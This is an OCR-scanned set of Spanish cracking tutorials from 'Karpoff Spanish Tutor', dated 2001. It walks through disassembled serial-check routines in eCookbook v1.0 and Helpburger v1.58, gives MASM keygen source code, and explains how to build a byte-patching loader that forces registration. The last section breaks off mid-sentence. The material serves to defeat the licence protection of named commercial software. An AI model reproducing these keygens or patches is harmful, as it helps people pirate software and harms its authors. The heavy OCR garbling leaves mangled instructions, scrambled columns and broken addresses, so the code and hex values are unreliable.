La variable nomorig debe tener 25 caracteres como la variable nombre, por lo que acabamos de llenarla 
con ceros. En la variable cadena2 dejamos seis espacios al principio, para poder poner la fecha. 


.code 
start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL,ADDR DlgFunc, NULL 
invoke ExitProcess,NULL 


D1lgFunc proc hD1g:DWORD, uMsg: DWORD, wParam: DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,ADDR Icono 
mov hlIcon,eax 
invoke SendMessage, hDlg, WM_SETICON, 1,hIcon 
invoke SetDlglItemText,hDlg, IDC_NOMBRE,ADDR nomorig 


Condiciones de partida: la ventana, el icono y nuestro nombre. 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


Si cerramos desde la parte superior derecha, salimos del programa. 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke EndDialog,hDl1g,NULL 
.e€lseif ax==IDC_INFO 
invoke MessageBox,hDl1g,ADDR txt1,ADDR txt2,MB_ICONINFORMATION 
.€lseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NOMBRE,ADDR nombre,26 
invoke GetDlglItemText,hDlg,IDC_NOMBRE,ADDR nomorig,26 
invoke Operacion 
.1f eax==1 
invoke MessageBox,hDl1g,ADDR error2,ADDR error1,MB_ICONSTOP 
.else 
invoke SetDlglItemText,hDlg,IDC_SERIAL,ADDR serial 
invoke SetDlglItemText,hDlg, IDC_NOMBRE,ADDR nomorig 
.endif 


ret 
.endif 
.endif 
.endif 


Si le damos a un botón, el programa actúa en consecuencia. Si es el de salir, cierra el programa; si es el de 

info, muestra una pantalla con la información que hemos definido; y si es el de generar, lee el nombre de la 
ventana (he utilizado la misma instrucción dos veces para pasar el nombre a dos campos distintos: el campo 
nombre con el que vamos a trabajar y el campo nomori g que es el que mostrará la ventana del nombre al 


volver de Operacion) y nos manda a Operacion, que es el núcleo del programa. A la vuelta, si no se ha 
producido un error, nos muestra el nombre y el serial correspondiente. 


ret 
Dl1lgFunc endp 
Operacion proc 


pushad 


Guardamos los registros por si acaso... 


xXor eax, eax 
invoke GetLocalTime, Offset campo 


La función GetLocalTime nos devuelve en la variable campo, 16 bytes con la siguiente información: 


A A M M ds ds DD h h m m s s ms ms 


Donde el año está en formato de cuatro cifras, ds es el día de la semana empezando por el domingo (0) y ms 
son milisegundos. 


mov ecx, Offset cadena2 
mov ebx, Offset campo+2 
invoke Subrutina 


Vamos a Subrutina para calcular el mes. 


mov ebx, Offset campo+6 
invoke Subrutina 


Ahora el día. 


mov ax, word ptr [ecx-2] 
mov edx, Offset dia 

mov word ptr [edx], ax 
mov ebx, Offset campo 
invoke Subrutina 


Y finalmente, el año. 


mov ebx, Offset nombre 
invoke lstrlen, offset nombre 


.1f eax<5 
popad 
mov eax, 1 
ret 

.endif 


Si el nombre tiene menos de cinco caracteres, recuperamos los registros, volvemos y mostramos el mensaje 
de error, ya que el programa sólo admite nombres de cinco o más caracteres. 


mov edx, eax 
push ebx 
completar: 

.1f eax<15 
mov cl, byte ptr [ebx] 
mov byte ptr [ebxtedx], cl 
inc eax 
inc ebx 
jmp completar 

.endif 


Si el nombre tiene menos de quince caracteres, lo completamos con las primeras letras, hasta llegar a quince. 


ebx 
eax, 


pop 
xor 
xor 
buclel: 

mov 
CE 


eax 
ecx, ecx 
cl, byte ptr 
ecx== 
jmp seguir 
.endif 
.1f ecx>96 
.1f ecx<123 
sub ecx, 32 
.endif 
.endif 
mov [ebx+eax], 
inc eax 
jmp buclel 


[ebx+eax] 


cl 


Si el nombre contiene letras minúsculas, las pasamos a mayúsculas. Como antes he comentado, esto no vale 
para la ñ, la q, ni las vocales acentuadas. 
Ahora ya tenemos todas las cosas en su sitio, es el momento de sumarlo todo. 


seguir: 


Offset 
Offset 
offset 
offset 
offset 


esi, 
edi, 
edx, 
ebp, 
eax, 


mov 
mov 
mov 
mov 
mov 
bucle2: 

push eax 

mMOVZX eax, 


mov cl, byte ptr 


byte ptr 


cadenal 
cadena2 
dia 

abc 
serial 


[ebx] 
[esi] 


jmp final 
.endif 


Como tanto el serial como cadena1 tienen 15 caracteres, controlando el final de cadena1, sabremos que 
hemos llegado también al final del serial. 


add eax, ecx 

mov cl, byte ptr [edi] 
add eax, ecx 

mov cl, byte ptr [edx] 
add eax, ecx 

mov cl, byte ptr [edx+1] 
add eax, ecx 

push edx 

xor edx, edx 

mov ecx, 23 

idiv ecx 

mov cl, byte ptr [ebpt+edx] 
pop edx 

pop eax 

mov [eax], cl 

inc esi 

inc edi 

inc eax 

inc ebx 

jmp bucle2 


Hemos sumado, hemos dividido, hemos encontrado cada letra y la hemos ido poniendo en su sitio. 


final: 
popad 


Recuperamos los registros, y estamos de vuelta. 


ret 
Operacion endp 
Subrutina proc 


MOVZX €aX, word ptr [ebx] 
push ecx 

mov ecx, 10 

xor edx, edx 

idiv ecx 

add dl, 48 

mov byte ptr [ebx+10], dl 
xor edx, edx 

idiv ecx 

add dl, 48 

mov byte ptr [ebx+11], dl 


Esta parte se encarga de obtener los códigos ASCII de las dos últimas cifras decimales de la parte de la 
variable campo2 que nos interesa (correspondientes al mes, día y año respectivamente) y de colocarlas en un 


lugar de la misma variable, en el que los datos que contiene no nos son de utilidad. 


mov al, byte ptr [ebx+11] 
pop ecx 

mov [ecx], al 

inc ecx 

mov al, byte ptr [ebx+10] 
mov [ecx], al 

inc ecx 


Pasamos los códigos obtenidos al lugar correspondiente de cadena2 y regresamos. 
ret 
Subrutina endp 


end start 


Como siempre, quiero recordaros que debéis pagar por los programas que utilicéis regularmente, así cuando 
llamen a vuestra puerta, podréis abrir con la seguridad de que no vais a encontraros con unos señores vestidos 
con traje gris, mostrando unas brillantes placas y unas caras muyyyyy serias ;-) 


Para terminar, quiero saludar a Act MagO, PrfEsOr X, ByTESCRK, DeK_Oin, Karpoff, KuaTo_ThoR y 
Silver Storm y por supuesto a todos los que habéis llegado hasta aquí. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante Ohotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


eCookbook v1.0 


Name / Serial 


Hacer un Keygen 


Este es un bonito programa de recetas de comida, puedes crear las tuyas o hacer uso de 
las casi 170 que trae el programa (lastimosamente en inglés), sin embargo, el programa 
está mal protegido. Esperemos que por ser la primera versión mejore en las próximas. 


Facililla. 


http://code6.netfirms.com 


TRW2000, W32dasm, MASM32 


ByTESCRK FECHA: 08/11/2001 


INTRODUCCION 


Después de pasarme algunos días de vacaciones, he vuelto a las andadas ahora con este nuevo 
programa de nombre eCookbook, no pretendía que este fuera el noveno tutorial y sobre todo en base 
a este programa, pero me ha convencido lo tonto de esta protección, si es que así se le puede llamar 
a esto, tan solo imagínalo, tú sales de tu casa y dejas la llave debajo de la alfombra que está en la 
puerta, luego un desconocido llega, se para en la puerta de tu casa y piensa en donde podrías haber 
escondido la llave, luego se le ocurre que podría estar debajo de la alfombra frente a la puerta, algo 
así para con este programa, solo que no necesitamos pensar ni quebrarnos la cabeza para encontrar 
el serial válido, ahh! y por si fuera poco el otro programa ColorPal v1.0 se obtiene de la misma 
manera, la diferencia es que el serial es distinto (lógico no, me refiero a la manera de encontrar el 
serial), bueno ya verán a lo que me refiero. 


AL ATAKE 


Bueno, vamos a empezar abriendo el programa y nos vamos a Help > About ... > Register, ya alli nos 
aparecen dos botones, uno de Ok y otro de Register y arriba el mensaje de que tenemos 30 días para 
registrarnos, hacemos clic en Register y nos aparecen nuestros fieles amigos (Mr. Ingrese Nombre y Mrs. 
License Key :D), ingresamos nuestros nombre y serial malo... 


Full Name = ByTESCRK 
License key = 19770424 


Y nos aparece una ventanita de error que dice... 


Your license key is not correct! 
Please enter your license key exactly as you recieved it. 


Ahora desensamblamos el archivo eCookbook.exe en el W32DASM y a Strings Reference allí buscamos ese 
error, vemos que aparecen varios 


Los que nos interesan son: 


You have not entered your name! 
Your license key is not correct! <- Hacemos doble clic en este 
Your name must be at least 6 characters <- Si entramos un nombre menor a 6 letras da error 


Al hacer doble clic 


:00498BCD E8127CFAFF call 004407E4 

:00498BD2 6A00 push 00000000 

:00498BD4 668B0DD88D4900 mov cx, word ptr [00498DD8] 
:00498BDB B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"Your license key is correct!" 


| 

:00498BDD B8E48D4900 mov eax, 00498DE4 

:00498BE2 E8A514FAFF call 0043A08C 

:00498BE7 C7864C02000001000000 mov dword ptr [esi+0000024C], 00000001 
:00498BF1 EB43 ¡mp 00498C36 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0049893A(C) <- Vamos a investigar en este salto 


| 

:00498BF3 6A00 push 00000000 

:00498BF5 668B0DD88D4900 mov cx, word ptr [00498DD8] 
:00498BFC B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Your license key is not correct!" 


| 

:00498BFE B8308E4900 mov eax, 00498E30 <- Caemos aqui 
:00498C03 E88414FAFF call 0043A08C 

:00498C08 EB2C jmp 00498C36 


Vamos a ir a investigar a 0049893A y nos encontramos con esto... 


:00498924 BA06000000 mov edx, 00000006 

:00498929 E8B2C1F6FF call 00404AEO 

:0049892E 8B9504FEFFFF mov edx, dword ptr [ebp+FFFFFEO4] 
:00498934 58 pop eax 

:00498935 E82AC2F6FF call 00404B64 <= Ponemos un breakpoint aqui 
:0049893A 0F85B3020000 jne 00498BF3 

:00498940 B201 mov dl, 01 

:00498942 A1A0194600 mov eax, dword ptr [00461940] 
:00498947 E85491FCFF call 00461AA0 

:0049894C 8BD8 mov ebx, eax 

:0049894E BA01000080 mov edx, 80000001 

:00498953 8BC3 mov eax, ebx 

:00498955 E8E691FCFF call 00461B40 

:0049895A B101 mov cl, 01 


* Possible StringData Ref from Code Obj ->"1SoftwarelCode6leCookbook" 


| 

:0049895C BA2C8D4900 mov edx, 00498D2C 
:00498961 8BC3 mov eax, ebx 

:00498963 E83C92FCFF call 00461BA4 


:00498968 B9508D4900 mov ecx, 00498D50 
* Possible StringData Ref from Code Obj ->"Registered" 


| 

:0049896D BA5C8D4900 mov edx, 00498D5C 

:00498972 8BC3 mov eax, ebx 

:00498974 E8C793FCFF call 00461D40 

:00498979 8D95FOFDFFFF lea edx, dword ptr [ebp+FFFFFDFO] 


Vamos a abrir nuestro TRW2000 y buscamos el programa clic en Ok y ponemos un punto de ruptura en 
00498935 pues casi siempre los programas comparan el serial o lo generan en una call antes, salimos del 
TRW2000 con ctrl+n y carga el programa, nos vamos a Help > About ... > Register hacemos clic en OK, 
brinca el TRW2000 y que es este código extraño que vemos en EDX será nuestro código de registro, 
apuntémoslo, borremos el breakpoint con BC * y salimos de TRW2000 nuevamente y lo ingresamos, ok, ya 
estuvo programa registrado. Vieron, servido en bandeja de plata. 


Pero dijimos que ibamos a hacer un keygen entonces sigamos... 


Vamos investigar mas arriba y vemos que no hay ningún otro salto, que venga desde afuera, bueno 
buscaremos el principio de la rutina de generación del serial y es precisamente aqui... 


:0049875C 55 push ebp <- Ponemos un breakpoint para romper desde aqui 
:0049875D 8BEC mov ebp, esp 
:0049875F B948000000 mov ecx, 00000048 


:004987B0 ESFF7FFAFF call 004407B4 

:004987B5 8B8524FEFFFF mov eax, dword ptr [ebp+FFFFFE24] 
:004987BB E860C2F6FF call 00404420 

:004987C0 83F806 cmp eax, 00000006 <= Compara que el nombre sea mayor a 6 letras 
:004987C3 0F8C41040000 jl 00498C0A <= Si es menor ¡error! 
:004987C9 8D9520FEFFFF lea edx, dword ptr [ebp+FFFFFE20] 
:004987CF 8B8618030000 mov eax, dword ptr [esi4+-00000318] 
:004987D5 E8SDA7FFAFF call 004407B4 

:004987DA 8B8520FEFFFF mov eax, dword ptr [ebp+FFFFFE20] 
:004987E0 E83BC2F6FF call 00404420 

:004987E5 85CO0 test eax, eax 

:004987E7 7E4F jle 00498838 

:004987E9 8945F8 mov dword ptr [ebp-08], eax 

:004987EC BBO1000000 mov ebx, 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00498836(C) 


| 

:004987F1 8D951CFEFFFF lea edx, dword ptr [ebp+FFFFFE1C] 

:004987F7 8B8618030000 mov eax, dword ptr [esi+00000318] 

:004987FD E8B27FFAFF call 004407B4 

:00498802 8B851CFEFFFF mov eax, dword ptr [ebp+FFFFFE1C] <= Nuestro nombre 

:00498808 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae el primer caracter en HEX 
:0049880D 50 push eax 

:0049880E 8D9518FEFFFF lea edx, dword ptr [ebp+FFFFFE18] 

:00498814 8B8618030000 mov eax, dword ptr [esi4+-00000318] 

:0049881A E8957FFAFF call 004407B4 

:0049881F 8B8518FEFFFF mov eax, dword ptr [ebp+FFFFFE18] <= Nuestro nombre 

:00498825 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae el primer caracter en HEX 
:0049882A 5A pop edx <= Recupera el valor en HEX guardado en memoria 

:0049882B OFAFDO ¡mul edx, eax <= Multiplica los valores y el resultado va a EDX 

:0049882E O3FA add edi, edx <= Agrega el valor a EDI 

:00498830 03FB add edi, ebx <= Suma EBX a EDI (EBX tiene valor 1) 

:00498832 43 inc ebx <= Incrementa EBX 

:00498833 FF4DF8 dec [ebp-08] <= Decrece el valor del tamaño del nombre 

:00498836 75B9 jne 004987F1 <= Si no se ha terminado la cadena va a 004987F1 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004987E7(C) 


| 

:00498838 8D9514FEFFFF lea edx, dword ptr [ebp+FFFFFE14] 
:0049883E 8B8618030000 mov eax, dword ptr [esi+00000318] 
:00498844 ES6B7FFAFF call 004407B4 


:00498849 8B8514FEFFFF mov eax, dword ptr [ebp+FFFFFE14] 
:0049884F E8CCC1F6EFF call 00404420 

:00498854 8BD8 mov ebx, eax 

:00498856 83FB01 cmp ebx, 00000001 <= Compara el valor de EBX 
:00498859 7C48 jl 004988A3 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004988A1(C) 


| 

:0049885B 8D9510FEFFFF lea edx, dword ptr [ebp+FFFFFE10] 

:00498861 8B8618030000 mov eax, dword ptr [esi4+-00000318] 

:00498867 E8487FFAFF call 004407B4 <= Cuenta cuántos caracteres 

:0049886C 8B8510FEFFFF mov eax, dword ptr [ebp+FFFFFE10] <= Nuestro nombre 

:00498872 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae letra por letra desde atrás 
:00498877 50 push eax 

:00498878 8D950CFEFFFF lea edx, dword ptr [ebp+FFFFFEOC] 

:0049887E 8B8618030000 mov eax, dword ptr [esi4+-00000318] 

:00498884 ES2B7FFAFF call 004407B4 <= Cuenta cuántos caracteres 

:00498889 8B850CFEFFFF mov eax, dword ptr [ebp+FFFFFEOC] <= Nuestro nombre 

:0049888F 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae letra por letra desde atrás 
:00498894 99 cdq 

:00498895 F7FB idiv ebx <= Divide EAX entre EBX (EBX tiene el total del conteo de caracteres) 
:00498897 5A pop edx <= Recupera el valor en HEX de la letra 

:00498898 OFAFDO imul edx, eax <= Multiplica EDX por EAX 

:0049889B 0155FC add dword ptr [ebp-04], edx <= Acumula el valor 

:0049889E 4B dec ebx <= Decrece EBX en 1 

:0049889F 85DB test ebx, ebx <= Compara no igual a cero 

:004988A1 75B8 ¡ne 0049885B <= Si se cumple continua hasta finalizar el nombre 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00498859(C) 


| 

:004988A3 8D9508FEFFFF lea edx, dword ptr [ebp+FFFFFEO8] 

:004988A9 8B861C030000 mov eax, dword ptr [esi+0000031C] 

:004988AF E8007FFAFF call 004407B4 

:004988B4 8B8508FEFFFF mov eax, dword ptr [ebp+FFFFFEO8] <= Nuestro código malo 
:004988BA 50 push eax <= Lo guarda en EAX 


* Possible StringData Ref from Code Obj ->"ecl1x" 


| 

:004988BB 68048D4900 push 00498D04 <= Guarda el valor ec1x en 00498D04 
:004988C0 8D95FCFDFFFF lea edx, dword ptr [ebp+FFFFFDFC] 

:004988C6 8B8618030000 mov eax, dword ptr [esi+00000318] 

:004988CC E8E37EFAFF call 004407B4 

:004988D1 8B85FCFDFFFF mov eax, dword ptr [ebp+FFFFFDFC] 

:004988D7 E844C1F6FF call 00404A20 

:004988DC 8D9500FEFFFF lea edx, dword ptr [ebp+FFFFFEOO] 

:004988E2 E81DO7F7FF call 00409004 

:004988E7 FFB500FEFFFF push dword ptr [ebp+FFFFFEOO] 

:004988ED 68148D4900 push 00498D14 

:004988F2 8D95F8FDFFFF lea edx, dword ptr [ebp+FFFFFDF8] 

:004988F8 8BC7 mov eax, edi <= Mueve el valor de EDI a EAX, es el valor del cálculo 
:004988FA E80507F7FF call 00409004 <= Transforma el valor a Decimal 
:004988FF FFB5F8FDFFFF push dword ptr [ebp+FFFFFDF8] 


* Possible StringData Ref from Code Obj ->"g-w" 


| 

:00498905 68208D4900 push 00498D20 <= Guarda el valor g-w en 00498D20 
:0049890A 8D95F4FDFFFF lea edx, dword ptr [ebp+FFFFFDF4] 

:00498910 8B45FC mov eax, dword ptr [ebp-04] <= El valor del segundo cálculo en HEX 
:00498913 ESECO6F7FF call 00409004 

:00498918 FFB5F4FDFFFF push dword ptr [ebp+FFFFFDF4] 

:0049891E 8D8504FEFFFF lea eax, dword ptr [ebp+FFFFFEO4] 

:00498924 BA06000000 mov edx, 00000006 


:0049892E 8B9504FEFFFF mov edx, dword ptr [ebp+FFFFFEO04] <= Lo mueve a EDX 
:00498934 58 pop eax 

:00498935 E82AC2F6FF call 00404B64 <= Va a hacer la comparación de seriales 
:0049893A 0F85B3020000 jne 00498BF3 <= Si es malo ¡Error! 

:00498940 B201 mov dl, 01 


:00498942 A1A0194600 mov eax, dword ptr [004619A0] 


Si abre el registro de Windows y ves en Software/Code6/eCookbook encontrarás un clave de nombre Key y 
otra de nombre Registrant, además si ves en el directorio en donde está instalado el programa verás un 
nuevo archivo de nombre eCookbook.key que contiene nada más y nada menos el serial que hemos 
generado. Este se compara con el Key del registro y si no coinciden dá error. 


Ahora vamos a ver como nos quedaría nuestro programa ya generado o nuestro código fuente en MASM, pero 
antes quiero decirles que parte de este programa está basado en el buen trabajo que ha hecho en sus 
tutoriales mi buen amigo CaoS ReptantE, Mr Crimson (¿Cómo crackear con ASM?) y JOTAKE. Ok, allí va el 
código... me limito a poner como siempre únicamente las rutinas de generación del serial pues el rsrc.rc y el 
inicio del keygen.asm están más que comentados en los tutoriales de quienes ya mencioné. 


La rutina de DECIMAL ha sido gentilmente donada por CaoS ReptantE 


Este es mi primer programa en ASM les ruego me perdonen si encuentran algun error o algo que se pueda 
mejorar 


Operacion proc 


invoke Istrlen, ADDR nombre 
lfeax<6 

mov eax,1 

ret 
.endif 


pushad 

mov edi, offset nombre 

mov esi, offset serial 

mov dword ptr[esil,78316365h 
add esi,4 

push eax 


If eax < 10 
add eax,30h 
mov dword ptr[esi],eax 
jmp paso3 

.endif 


pop eax 
add esi,1 
mov ecx, 10 
push eax 
pasol: cmp eax, ecx 
jb paso2 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esil, dl 
dec esi 
jmp pasol 
paso2: add al, 30h 
mov byte ptr [esil, al 
add esi,1 


paso3: mov ebx, 1 
pop eax 
mov edx, eax 
xXOr ecx, ecx 
push eax 


calc1: movzx eax, byte ptr [edi+edx-01] 

imul eax, eax 

add ecx, eax 

add ecx, ebx 

inc ebx 

dec edx 

jne calcl1 

add esi,1 


mov dword ptr[esil,2Dh 
.IHfecx < 186A0h 
add esi,5 
mov ebx,5 
.else 
add esi,6 
mov ebx,6 
.endif 
push ebx 
mov eaX, ecx 
invoke Decimal 
pop ebx 
add esi,1 
mov dword ptr[esil,772D67h 
add esi,2 
pop eax 
mov ebx, eax 
mov edi, offset nombre 
push esi 
xor esi, esi 


calc2: movzx eax, byte ptr [edi+ebx-01] 
mov ecx,eax 
cdq 
idiv ebx 
imul ecx, eax 
add esi, ecx 
dec ebx 
test ebx, ebx 
jne calc2 
mov ecx, esi 
pop esi 
.IHfecx < 186A0h 
add esi,5 
mov ebx,5 
.else 
add esi,6 
mov ebx,6 
.endif 
mov eaX, ecx 
invoke Decimal 


popad 

ret 
Operacion endp 
Decimal proc 


xor ebx, ebx 
mov ecx, 10 
dividir: 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esi+ebx], dl 
dec ebx 
If eax>9 
jmp dividir 
.endif 
add al, 30h 
mov byte ptr [esi+ebx], al 
ret 


Decimal endp 


end start 


6 eCookbook vl.0 


Nombre [ByTESCAK 
Selial [ec1 :8-545729-418773 


Calcula Copiar | 


Ahora ya podemos usar el programa, aunque sin embargo quiero que recuerdes, lo de siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si ha USTED, le gusta el producto por favor 
COMPRELO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE (¡Gracias nuevamente por tus 
consejos y apoyo incondicional!) y a todos los crackers hispanohablantes, en especial a ti por que has 
llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: Helpburger v1.58-R1 B32 

PROTECCION: Serial 

Objetivo: Obtener un serial válido, Crear un loader 

eecion: Ua peo9tama que permite la creación de archivos de 
ayuda de Windows 

Dificultad: Novato 

DOWNLOAD : http: //www.langdaledesigns.co.uk/hb/hb_setup.exe 

Herramientas: OllyDBG, W32DASM, Princess Sandy 

CRACKER: ByTESCRK FECHA: 18/11/2001 


INTRODUCCION 


Hola, ¿como están?, habia pensado hacer un cuarto tutorial, sin embargo, no sobre 
esto, pero debido a que deseo aclarar algunas dudas, de que hacer respecto a algunas 
situaciones que a veces surgen, como por ejemplo: ¿qué hacer si ingresamos un serial 
y el programa no dice si es bueno o malo, si no que sigue siendo “sin registrar”?, es 
debido a eso que ha surgido este tuto y la forma de crackeo que yo en lo personal 
llamo "la puerta trasera". 


AL ATAKE 


Antes que nada vamos a empezar cargando el OllyDB, este programa es muy sencillo y fácil de usar, 
algunas ya se habrán preguntado, ¿por qué usa el solo programas para windows?, ¿por qué creen?, 
por que mi sistema operativo es Windows Millennium y por no estar reinstalando mi software a cada 
momento, es por eso que lo uso. Pero bueno volvamos a lo nuestro estre programa es muy intuitivo, 
¡seguramente sus autores habrán pasado algún tiempo diseñando su protección, la cual no explicaré, 
¡puesto que aún no entiendo aún a cabalidad, sin embargo, hay algunos puntos que no consideraron. 


¡Teclas de ayuda para OllyDBG 


F2 = Poner y quitar un punto de ruptura 
F7 = Entrar en una call 

F8 = Tracear paso a paso 

F9 = Tracear al final 

Enter = Entrar en la call sin tracer 


Analizando a nuestra victima 
Cargamos el programa y presionamos F4, se abren nuestras opciones, hacemos clic en la pestaña Registration 


1.- Ingresamos un nombre por ejemplo ByT'ESCRK en la casilla Copyright Message 
2.- Ingresamos un número de serie por ejemplo 123456 
3.- Clic en Ok y no nos dice nada, al ir a Help > About... vemos que sigue sin registrar 


¿Qué buscar? 


Al usarlo nos damos cuenta que no activa, la casillo No Splash screen. Vamos a la ayuda y vemos los 
beneficios por ser usuarios registrados. 


Benefits of Registration 


Unlocked features - When you register Helpburger, you will be emailed a registration code which you enter 
into the Helpburger registration options screen. This code unlocks the restrictions in the trial version : 


- No limit on number of help topics - the trial version is limited to a maximum of 20 topics in a help 
project. With the registered version, you can have as many topics as you like 


- Your title and copyright message in your finished help file. The trial version uses fixed messages. 
Registering makes your finished help files look more professional. 


- Automatic replacement of abbreviations as you type - saving a lot of your time as you can automatically 
insert frequently used words and phrases into your help file with less typing and less mistakes (see options). 
This feature is similar to Microsoft Word's 'Autocorrect' feature. 


- Improved options and preferences selection - including the option of disabling the splash screen when the 
program starts, and you gain complete control over your help file source by being able to fine tune the help 
project source-code before it is converted to a help file. 


Y en especial cuando creamos nuestro archivo de ayuda sale un título "Created by an unregistered version of 
Helpburger", odio eso. Ok estos son los puntos que atacaremos, pero en especial uno el de usuario registrado, 
entonces empecemos. 


Decompilamos el programa en W32DASM y una vez su código pueda verse, buscamos la cadena 
“unregistered”, viendo en las Reference Strings encontramos una y arriba otra que dice “ Registered”, 
hacemos doble clic 


sobre ella. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


[:004859C7(U) 


:004859F2 ES654D0000 call 0048A75C  <-Vamos a poner un punto de ruptura aquí 
:004859F7 84C0 test al, al <-Sial=0 

:004859F9 7431 je 00485A2C <- al =0 entonces ir a 00485A2C 

:004859FB 8D55EC lea edx, dword ptr [ebp-14] 

:004859FE 8B45FC mov eax, dword ptr [ebp-04] 


:00485A01 8B80D8020000 mov eax, dword ptr [eax+000002D8] 
:00485A07 ESA4ASEFAFF call 004302B0 
:00485A0C 8D45EC lea eax, dword ptr [ebp-14] 


* Possible StringData Ref from Code Obj ->" Registered" <- Caemos aqui, investigamos para arriba. 


:00485A0F BAACSA4800 mov edx, 00485AAC 
:00485A 14 ESSFE3F7FF call 00403D78 
:00485A19 8B55EC mov edx, dword ptr [ebp-14] 


Aquí debiera de aparecer el código del “ Unregistered”, pero ha sido omitido. 
Entrando en la llamada vemos lo siguiente... 


* Referenced by a CALL at Addresses: 
|:0047AAD6 , :0047B3BC , :0047E9DD , :0047FC7E , :004859F2 
[:004862D2 , :0048BDED , :0048BE06 , :0048C813 , :0048E9BD 


[:0048F50C 

:0048A75C 55 push ebp 
:0048A75D 8BEC mov ebp, esp 
:0048A75F 51 push ecx 


:0048A760 C645FF00 mov [ebp-01], 00 


* Possible StringData Ref from Code Obj ->"HB4"<- Algo así como un tipo de Service Pack 


:0048A764 B990A74800 mov ecx, 0048A790<- Recibe el valor HB4 

:0048A769 8B152C894900 mov edx, dword ptr [0049892C] 

:0048A76F A128894900 mov eax, dword ptr [00498928]<- Lleva nuestro serial malo 
:0048A774 ESA7AAFEFFF call 00485220<- Entramos aqui 

:0048A779 84C0 test al, al 

:0048A77B 7404 je 0048A781 

:0048A77D C645FFO1 mov [ebp-01], 01 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:0048A77B(C) 


:0048A781 8A45FF mov al, byte ptr [ebp-01]<- Si deseamos crackearlo cambiemos esto por B00190 
:0048A784 59 pop ecx 

:0048A785 5D pop ebp 

:0048A786 C3 ret 


Pero, como nuestra intención es encontrar el serial correcto entramos a la llamada en 0048A774 y 
encontramos 
esto, la rutina de generación del serial. 


* Referenced by a CALL at Address: 
[:0048A774 


:00485220 55 

:00485221 8BEC 
:00485223 83C4E8 
:00485226 894DF'4 
:00485229 8955F8 
:0048522C 8945FC 
:0048522F C645F300 
:00485233 837DF800 
:00485237 7427 
:00485239 8B55F4 
:0048523C 8B45F8 
:0048523F ESBOFDFFFF 
:00485244 8945E8 
:00485247 33D2 
:00485249 8B45FC 
:0048524C E8032EF8FF 
:00485251 8945EC 
:00485254 8B45EC 
:00485257 3B45E8 
:0048525A 7504 


push ebp 

mov ebp, esp 

add esp, FFFFFFES 

mov dword ptr [ebp-0C], ecx 

mov dword ptr [ebp-08], edx 

mov dword ptr [ebp-04], eax 

mov [ebp-0D], 00 

cmp dword ptr [ebp-08], 00000000 <- Verifica que no sea nulo 
je 00485260  <- Si el serial es nulo brinca a 00485260 

mov edx, dword ptr [ebp-0C] 

mov eax, dword ptr [ebp-08] 

call 00484FF4  <- Esta es la rutina de generación del serial 
mov dword ptr [ebp-18], eax  <- Aqui ya nos aparece el serial en eax 
xor edx, edx 

mov eax, dword ptr [ebp-04] <- Recibe nuestro serial 
call 00408054  <- Aqui chequea nuestro serial 

mov dword ptr [ebp-14], eax 

mov eax, dword ptr [ebp-14] 

cmp eax, dword ptr [ebp-18]  <- Compara los dos seriales 

jne 00485260  <- Si no son iguales brinca a 00485260 


:0048525C C645F301 
:00485260 8A45F3 
:00485263 8BES mov esp, ebp 

:00485265 5D pop ebp 

:00485266 C3 ret <- Retorna con al = 0 si el serial es malo o al = 1 si es bueno 


mov [ebp-0D], 01  <- Si brinca no guarda el valor 1 en ebp-0D 
mov al, byte ptr [ebp-0D]  <- Si ha brincado ebp-0D = 0 


Al momento de estar en 00485244 podemos hacer clic en EAX en los registros al lado superior derecho y 
presionar enter, veremos el valor que tiene EAX en mi caso es igual a 01727377h o lo que es igual a 
decir 2427777%d 


CREANDO EL LOADER 


Primeramente bajarnos el programa Princess Sandy de Eminence, luego vamos a cargarlo, sabemos que 


la dirección que tenemos que modificar es 00485260, cargamos el programa y nos pide el nombre del 
programa que queremos parchar, al nosotros asignárselo ya podemos ver la ventana principal del programa, 
luego hacemos clic en el botón Add Item, nos aparece otra ventanita, ingresamos la dirección 00485260, la 
instrucción original en HEX (8A45F3), luego nuestra instrucción a modificar siempre en HEX (B00190), clic 
en Add y si ya no vamos a parchar en BUILD, nos pedirá el nombre el programa loader, hacemos clic en 
Guardar y listo, nuestro loader ha sido creado y tendremos una versión registrada hasta que esta cambie (si 
